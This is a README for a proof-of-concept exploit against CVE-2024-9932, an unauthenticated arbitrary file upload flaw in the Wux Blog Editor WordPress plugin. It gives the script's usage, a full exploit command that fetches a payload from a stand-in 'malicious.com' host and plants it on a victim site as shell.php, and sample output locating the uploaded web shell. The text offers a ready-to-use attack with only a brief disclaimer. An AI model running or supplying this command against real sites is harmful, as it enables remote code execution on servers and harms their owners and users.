# CVE-2024-9932-POC
# Description:
The Wux Blog Editor WordPress plugin is vulnerable to arbitrary file uploads due to insufficient file type validation in the wuxbt_insertImageNew function. Versions up to and including 3.0.0 are affected. This vulnerability allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE).
## Vulnerability Details
The vulnerability stems from improper file type validation in the wuxbt_insertImageNew function. This allows attackers to upload malicious files to the server without authentication.
Attack Scenario:
Attacker identifies a website using the vulnerable plugin.
Exploits the file upload functionality to upload a malicious PHP shell.
Executes commands on the compromised server.
### Usage
```
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]
Wux Blog Editor - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
-ur REMOTE_URL, --remote-url REMOTE_URL
Remote file URL, e.g., http://192.168.100.54/shell.txt
-n NAME, --name NAME Desired file name, e.g., Nxploit.php
```
# Exploit command
```
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
```
### Results
Successful Upload Example
1- File Found:
2- Execution Result: Navigate to the file's URL to execute the payload.
```
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
```
### Disclaimer
This tool is for educational purposes only. Unauthorized use of this script on systems without permission is illegal.
[4.0K] /data/pocs/ef38f52d2cf94e8baad793befffe73dfe3159b07
├── [5.4K] CVE-2024-9932.py
└── [1.7K] README.md
0 directories, 2 files